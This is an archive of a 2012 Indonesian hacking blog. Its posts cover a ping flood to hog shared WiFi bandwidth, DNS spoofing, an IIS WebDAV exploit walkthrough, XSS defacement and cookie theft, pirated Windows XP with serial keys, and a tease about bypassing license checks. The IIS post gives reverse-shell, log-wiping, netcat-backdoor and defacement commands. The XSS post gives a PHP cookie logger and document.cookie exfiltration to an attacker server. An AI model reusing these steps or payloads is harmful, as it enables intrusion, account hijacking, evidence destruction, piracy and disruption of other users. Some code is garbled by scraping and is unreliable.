Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Sabtu, Oktober 20, 2012

Bandwidth WiFi network.

ozcorp@team


Now I will try to share about how to take the bandwidth without using software netcutThis way I do because I am so angry at my friends who both use wifi because often use netcut. My annoyance prompted me to look for other ways cowering behind them, and the results were incredible, in use for youtube streaming not use buffering (* depending on the quality of wifi *). Okay increasingly curious of the better straight to the very thing in waiting, check it out.

Follow these steps without lacking any:
  • Go to RUN and then type cmd.exe, or can also directly type cmd.exe in the search field in the start menu (* for those who use Windows 7*).
 
  • Then it will appear like this.
 
  • Then Typing ipconfig/all in cmd. This command serves to display information about the connection where you are now. 


  • The result will be as below. containing all sorts of information about your computer. Then find the name DNS server then you must remember, and if necessary, write first in notepad. 
 


  • Then, scrolling down your cmd.exe, then you will find the command as an initial order for the type. Now the command ketikannya different again. Type the following command ping 10.0.1.2-L 500-t. and the code came from 10.0.1.2 DNS Servers listed above (my DNS Server). Replace with the DNS Server you.
 
  • Press Enter. It will appear as below process. Let the process continues as long as you're online using wifi where your place. When you need to reduce it, just do it in closed cmd.exe.
 


This method aims to take the bandwidth is being used by other people in one network hotspot / wifi equally guys use. If you are not satisfied with the speed can be changed 500 to 1000 or 2000. But I suggest do not overdo the pity of others. and in addition the method is valid only in windows linux it if I had not tried.

ozcorp@team

Sabtu, September 22, 2012

DNS Hacking



   Sorry saya baru posting lagi,karena banyak kesibukan di dunia nyata ,,,halaah so sibuk nya!! Oke sekarang saya akan mencoba share sedikit tentang DNS HACKING,.Mungkin untuk para Hacker senior dan sangat ahli dalam teknik hacking tolong jangan hiraukan postingan ini, karena teknik ini sudah lama sekali dan tentunya para master di luar sana sudah sangat mahir..
   Setiap hendak mencari alamat IP sebuah alamat domain, komputer anda menanyakan kepada server DNS. Apa yang terjadi apabila DNS Server membohongi anda??
   Pernahkan anda terbayang  bahwa DNS server tidak selalu bisa anda percaya? Mungkin saja anda sudah mengetikan alamat URL secara benar dan sangat benar tetapi yang keluar bukan situs yang anda kehendaki..!?
   Banyak orang yang hanya memastikan bahwa mereka telah mengetikan nama dengan benar dan itulah yang slalu terjadi.pada kejadian ini saya akan sedikit bercerita tentang teman saya yang telah saya kerjain, di karnakan keteledoran dia dengan menyimpan atau nngebookmark situs http://www.Klikbca.com kata dia sih biar ga perlu ngetik setiap kali. Ia mengikuti saran dari Bank BCA ketika ada pemalsuan situs yang memanfaatkan kesalahan ketik pengguna ( dengan membuat domain klikbca, kilibca, dsb yang palsu ).
   Otomatis dengan bookmark ini, ia percaya seratus persen dia ga bakal masuk ke situs palsu BCA padahal keyakinan seperti itu merupakan kesalahan yang sangat patal dan sangat berbahaya..
   Saya memulai penyerangan ini dengan melakukan DNS Spoofer yang ada di Chain & Able, yaitu DNS yang akan memberikan informasi palsu kepada komputer yang memintanya. DNS spoofer ini merupakan bagian dari peracunan ARP dan MITM. Artinya, serangan MITM harus di jalankan terlebih dahulu sebelum anda menjalankan DNS Spoofer.


   Untuk  menjalankan DNS spoofing anda tinggal memasukan host yang hendak di manipulasi. For excample dengan mengklik tombol + ( Plus ) seperti gambar di atas., saya mengatakan kepada cain & able agar setiap permintaan alamat IP untuk domain www.detik.com, maka berikan alamat IP 202.146.4.100 ( Alamat IP Kompas.com )


   Ketika korban hendak melihat situs detik denganmengetik www.detik.com, DNS spoofer akan memberikan jawabanyang salah yaitu alamat IP www.kompas.com .Akibatnya adalah URL tetap menujukan www.detik.com namun isi halamannya sediri sebenarnya merupakan isis situs www.kompas.com.
   Serangan seperti nin sangatlah berbahaya. Seorang hacker bisa saja membuat sebuah situs yang mirip dengan detik.com asli namun dengan berita yang palsu. Anda mungkian akan langsung percaya dan tak akan pernah menyangkan bahwa itu adalah situs palsu karena URL yang kita ketik sudah benar apalagi di tunjang dengan situs yang sama persis.
   Nahh , sekarang apa yang terjadi apabila situs yang di palsukan adalah situs Bank???? Anda tentu sudah membayangkan akibat yang bisa ditimbulkan dari metoda serangan seperti ini dan pasti anda sudah tahu apa alasannya seseorang melakukan pemalsuan alamat situs Bank.!!

Perhatian !!
   Saya harap ini hanya dijadikan sebuah pengetahuan kita apabila kita menajdi nasabah / administrator untuk lebih berhati-hati..karena seorang hacker akan memanfaatkan peluang walupun peluang tersebut hanya sekecil lubang semut. Dan bagi yang berpikir untuk mencoba cara/metoda ini untuk melakukan hal-hal yang dilarang/yang beurusan dengan hukum saya tidak bertanggung jawab dengan konsekuensi yang akan anda terima....

Terima kasih atas perhatiannya

Selasa, September 11, 2012

Windows 8 traspormation pack 6



Windows 8 Transformation Pack 6 adalah paket transformasi lengkap yang akan membuat PC anda terlihat menggunakan system operasi Windows 8. Windows 8 Transformation Pack 6 ini dapat digunakan untuk semua system operasi dari Windows XP, Windows Vista, dan Windows 7.
Requirements:
· NET Framework 2.0 - Required for system files transformation in Windows XP/Server 2003 x64 Editions Only
· NET Framework 4.5 - Required for Windows 8 features like User Tile/Metro UI Desktop/Auto-colorization

What's New in This Release: [ read full changelog ]
· Added Windows 8 RTM wallpapers
· Configured Aero frame UI, Metro Desktop UI and Aero's auto-colorization to be used by default if applicable
· Improved Segoe fonts family installation code for better compatibilities
· Updated Metro Inspirat theme with improved start orb and few adjustments
· Updated Newgen's start screen background to Windows 8 RTM's default
· Updated Segoe fonts family from Windows 8 RTM
· Updated TrueTransparency Aero skin rebuilt from Windows 8 RTM resources
· Updated Windows 8's Explorer toolbar layout configuration
· Updated Windows 8 theme for Windows 7 by wango911 with customized theme files
· Updated system files resources found in Windows 8 RTM
· Boot Screen (Windows XP)
· Logon screen background
· Navigation buttons
· Network tray icons
· Shell icons
· Shell pane background
· Shutdown/Logoff/Theme dialogs (Windows XP)
· Start button/orb
Semoga bermanfaat, ^_^
Link Download
/files/applicationimages/download.gif 
(47 Mb)
Password : www.gigapurbalingga.com
 
Sumber :
/files/applicationimages/2_computers.gif


Windows XP SP3 Black Edition

   Pada kesempatan kali ini saya akan share Free Download Windows XP SP3  Black Edition Terbaru | Download Windows XP SP3  Black Edition Full Version 2012 | Free Download Windows XP SP3 Black Edition Full Version 2012 | Windows XP SP3 Black Edition Full Version 2012 | Windows XP SP3 Black Edition Terbaru 2012 | Download Windows Xp Pro SP3 - Black Edition ISO | Download Windows XP Black Edition With SP3 Free | Windows Xp Sp3 Black Edition Full Download - Windows XP merupakan salah satu produk sukses yang diluncurkan microsoft. Hal ini terbaukti masih banyaknya pengguna XP terutama Windows XP SP3 Black Edition Terbaru Full Version 2012 yang merupakan versi editor dimana nantinya disertai beberapa aplikasi dan driver tambahan. Dengan Windows XP SP3 Black Edition Terbaru Full Version 2012 anda akan dimudahkan dalam proses instalasi karena tidak dipersulit dengan driver. Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012

Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012




Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012


Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012


Feature Windows XP SP3 Black Edition Terbaru Full Version 2012
  • Windows XP Powertoy - ClearType Tuner v1.01.
  • Windows XP Powertoy - Alt-Tab Replacement v1.0.
  • Windows User Profile Hive Cleanup Service v1.6g.
  • Microsoft BitLocker To Go Reader v1.0 (KB970401).
  • Windows Feature Pack for Storage v1.0 (KB952013).
  • Windows XP exFAT file system driver update package v1.0 (KB955704).
  • Windows XP GDI+ Detection Tool v1 (KB873374).
  • Windows XP QFEcheck v6.2.29.0.
  • Microsoft Windows Browser Choice (KB976002 v5).
  • Windows Genuine Advantage Validation v1.9.42.0 (KB892130) - Cracked Version.
  • 7-Zip v9.20.
  • Open Command Prompt ****l Extension v2.1.0.
  • HashCheck ****l Extension v2.1.11.
  • Unlocker v1.9.1.
  • STDU Viewer v1.5.647.
  • Paint.NET v3.5.8.
  • Java SE Runtime Environment (JRE) v6 Update 26.
  • Flash Player ActiveX Control v10.3.181.26.
  • Shockwave Player v11.5.9.626.
  • Microsoft Silverlight v4.0.60531.0.
  • Microsoft DirectX v9.29.1962.
  • Microsoft .NET Framework v1.1 SP1, v2.0 SP2, v3.0 SP2, v3.5 SP1, v4
  • Client, v4 Extended.
  • Microsoft Visual C-family v1, v7, v8, v9, v10, (v2, v3, v4, v5, v6 are
  • already included in Windows XP Service Pack 3).
  • Microsoft Visual Basic v1, v2, v3, v4, v7+, (v5, v6 are already included in Windows XP Service Pack 3



Untuk download silahkan pilih salah satu link Free Download Windows XP SP3 Black Edition Terbaru Full Version 2012 :


Sumber :

Serial Number Windows XP SP3 Black Edition Terbaru Full Version 2012 :
  • RPYPK-KC86X-PMFB4-GXGQW-4H7RR
  • B77QF-DP27W-4H68R-72B48-78RPD 

Senin, September 10, 2012

Otak-atik user melalui CMD (DOS)

Sekarang sudah jarang para pengguna computer mengenal adanya perintah yang diberikan kepada computer berupa perintah teks yang langsung dieksekusi oleh computer itu sendiri yang disebut dengan perintah DOS (DOS Command).
Misalkan saja untuk melihat isi suatu drive harddisk berupa file-file, kita harus mengetikan perintah dir supaya file-file yang ada pada drive bisa ditampilkan. Beda bukan dengan saat ini yang sudah dikenal dengan teknologi system operasi windows yang semuanya dapat dilakukan dengan mudah, yaitu hanya dengan explorer, semua file pada drive yang ditentukan dapat terlihat dengan jelas.
Diantara perintah-perintah DOS tersebut ada sebuah perintah yang juga sangat bermanfaat untuk menampilkan akun para pengguna computer serta mengganti password akun tersebut pada windows, yaitu perintah NET (huruf capital hanya mempertegas bahwa tulisan itu adalah sebuah perintah), dalam penggunaannya boleh dengan huruf besar atau kecil.
Sebagai informasi bahwa praktek mengubah password untuk user windows ini saya menggunakan windows xp service pack 2 (sp2) dan perintah ini hanya dapat dilakukan oleh seorang administrator, dengan begitu maka untuk melakukan perintah ini harus login menggunakan akun administrator sedangkan bila login menggunakan user yang lebih rendah haknya dari administrator maka perintah tersebut akan tidak berfungsi untuk mengubah password namun perintah tersebut hanya bisa digunakan untuk melihat user yang ada.
Berikut ini perintah untuk melihat dan mengubah password user yang ada pada windows xp sp2.
Pertama jalankan command prompt dengan cara klik Start-All Programs-Accessories-Command Prompt sehingga muncul jendela berwarna hitam seperti terlihat pada gambar berikut.

 

Pada command prompt ketikan perintah sebagai berikut : net user ENTER sehingga hasilnya seperti gambar berikut.

 

Dari user-user yang ada, anda bisa membuat sebuah password untuk user yang ada dan dapat juga menghapus password yang ada atau mengganti password yang ada dari setiap user yang ada.
Membuat password dan Mengubah Password
Untuk membuat password pada masing-masing user dapat dilakukan dengan memberikan perintah berikut ini.
Net user {nama user} {password}
Contoh : net user guest 1234
Penjelasannya : Net user adalah perintah, kemudian guest adalah nama user dan 1234 adalah password, jadi perintah di atas adalah membuat atau mengubah password bagi nama pengguna Guest. Perhatikan gambar berikut.

 

Setelah menekan ENTER maka muncul pesan “The Command Completed Successfully” yang menyatakan bahwa perintah pembuatan password untuk akun Guest sudah berhasil dengan baik. Untuk membuktikan bahwa akun Guest sudah menggunakan password 1234 coba klik menu Start-Log Off-Switch User dan gunakan akun Guest untuk login, maka windows akan meminta anda memasukan password karena anda sudah membuatnya pada command prompt. Ketik 1234 kemudian tekan ENTER untuk masuk ke akun Guest.

 

Setelah membuat atau mengubah password, tentu kita juga harus bisa menghapus password tersebut apabilah sudah tidak dibutuhkan lagi. Lalu bagaimana caranya ikuti langkah berikut ini.
Menghapus password
Akun Guest yang sudah dibuatkan passwordnya melalui command prompt, sekarang kita akan menghilangkannya atau menghapusnya, caranya dengan perintah berikut :
Net user guest * ENTER

 

Setelah menekan enter maka muncul pesan “Type a password for the user :” tekan ENTER saja karena kita tidak ingin membuat password melainkan menghapus password yang ada.
Berikutnya adalah pesan “Retype the password to confirm :” juga tekan ENTER saja karena tidak ada password sehingga muncul pesan yang terakhir “The Command Complited Successfully” yang berarti bahwa perintah menghilangkan password tersebut sudah berhasil dilakukan.
Perintah menghapus password di atas juga dapat digunakan untuk membuat sebuah password baru. Apabila hendak membuat password baru dengan perintah di atas maka pada saat muncul pesan “Type a password for the user :” maka tulis atau ketikan password untuk user tersebut (contoh : 1234) dan tekan ENTER, kemudian muncul pesan kedua “Retype the password to confirm :” maka ketiklan sekali lagi password (contoh : 1234) kemudian tekan ENTER.

Source : 

Hacking dengan IIS

Pada kesempatan kali ini saya akan share tentang hacking dengan IIS.
Ok. jangan berpanjang lebar lets go>>>

1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
Semoga bermanfaat.

Sumber :

binushacker.net
ozcorp.blogspot.com

Minggu, September 09, 2012

XSS attack utk pemula

  Saya berkeinginan membagikan sedikit yang saya punya. mungkin ini sekedar tutor cupu dari seorang new bee kaya saya ne.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.


Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menyuruh kacung paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan om Google.
Betul, kita menggunakan Dork dengan query sebagai berikut:

" inurl:"search.php?q=" "


atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum.

Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :


" alert("XSS") "


maka jika menampilkan dialog box seperti ini maka site itu vulner :




tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut :


tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut :

" "

nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh.
" http://www.Target.ac.id/search/?q="


kemudian apa yang terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi.
misalnya contoh gini: 





metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri

"


dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :


" window.open( "http://www.google.com/" ) "

maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.

Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Atau salin aja code dibawah ini :



$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>



Ok sekarang saya anggap anda sudah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini

" window.location = "http://server-lu.com/cookielogger.php?c="+document.cookie "

atau

" document.location = "http://Server-lu.com/cookielogger.php?c="+document.cookie "


hingga otomatis url pada site berubah menjadi

" http://Target.com/search.php?q=document.location
 "http://server-lu.com/cookielogger.php?c="+document.cookie "

Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan anda bisa mengawasi cookies yang didapatkan hingga ntar anda bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :


" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Sep 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Sep 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Sep 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Sep 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:25 sess_a4cdcxxxxxxx065ede6ecb062d443f86 "


Nah sekian tutor pendeknya, semoga aja berguna n keep posting and share you knowledge.

Sumber :
www.jasakom.com
www.Aurel666.co.cc
www.ozcorp.blogspot.com

Menembus proteksi serial number dan password

Latar belakang
Mungkin dalam keseharian ada di antara kita yang tidak sengaja menghilangkan Password atau Serial Number dari program yang sudah kita beli. Kalau sudah begitu tentunya repot. Untuk mendapatkannya kembali bisa saja dengan menghubungi toko retail maupun vendor program tempat program tersebut dibeli. Namun, jika ada peraturan dari vendor yang mengharuskan membeli ulang password maupun serial number yang hilang, bagaimana? Bagi Anda mungkin itu bukan masalah . Tapi bagi Saya itu mungkin salah satu masalah besar. Dari kasus inilah Saya mencoba menerapkan kegunaan Win32 Hook. Sekedar informasi, teknik seperti ini sering digunakan oleh para Reverser di dunia Reverse Engineering. Untuk melakukan debugging file berukuran besar bukan hal yang mudah, memerlukan waktu lama dan harus didukung dengan hardware yang cukup mewah. Bayangkan saja debugging file berukuran diatas 100 MB dan didalamnya mengandung Crypto RSA?!?! Kalau Saya sih membayangkan saja sudah tidak mau, apalagi benar-benar mempraktekkannya.. MALAS! Paper ini bukanlah sebuah tutorial, tetapi hanyalah sebuah informasi. Implementasi dari pemikiran Saya dengan menerapkan Win32 Hook. Jadi jangan berharap lebih ya? . Karena disini Saya tidak mengajak Anda melakukan proses Reverse Engineering ataupun Coding secara
mendalam.. MALAS! . Mungkin lain kali.. tapi gak janji loh..


Teori
Sekedar pengetahuan bagi Anda yang mungkin masih awam dengan istilah pemrograman dan dunia komputer, serta bagi Anda yang bukan Programmer (karena Anda berarti sama seperti Saya.. ) Hook atau Win32 Hook merupakan salah satu point mekanisme penanganan pesan (Message-Handling) di dalam Microsoft Windows. Dimana sebuah aplikasi dapat menginstal suatu sub-rutin untuk memonitor lalu lintas pesan didalam sistem dan beberapa proses tertentu dari pesan tersebut sebelum mencapai prosedur jendela target. Hook itu sendiri termasuk dalam kategori Handles and Object. Dan masuk dalam spesifikasi User object. Lantas mengapa hal “ANEH” ini diperlukan dalam teknik pemrograman?? Ada 2 alasan.. Pertama, penggunaan obyek dapat memastikan bahwa pengembang (Developer/Programmer) tidak menulis kode secara spesifik untuk low-level, struktur internal. Hal ini memungkinkan Microsoft untuk menambahkan atau mengubah kemampuan sistem operasi, sepanjang pemanggilan konvensi yang asli terjaga. Jadi jika suatu saat Microsoft meluncurkan Operating System, aplikasi yang dibuat oleh para developer ini akan mendapatkan kemampuan baru dengan sedikit penambahan atau tidak sama sekali. Kedua, pemakaian obyek memungkinkan pengembang (Developer/Programmer) mendapatkan keuntungan dari keamanan Win32. Masing-masing obyek mempunyai daftar kendali akses sendiri (access-control list /ACL) yang menetapkan jenis-jenis tindakan proses dapat berjalan pada obyek. Operating System menguji suatu obyek ACL setiap kali sebuah aplikasi mencoba untuk menciptakan handle pada obyek.


Windows APIs


SetWindowsHookEx (Referensi USER32.DLL)
HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle of application instance
DWORD dwThreadId // identity of thread to install hook for
);

CallNextHookEx (Referensi USER32.DLL)
LRESULT CallNextHookEx(
HHOOK hhk, // handle to current hook
int nCode, // hook code passed to hook procedure
WPARAM wParam, // value passed to hook procedure
LPARAM lParam // value passed to hook procedure
);

UnhookWindowsHookEx (Referensi USER32.DLL)
BOOL UnhookWindowsHookEx(
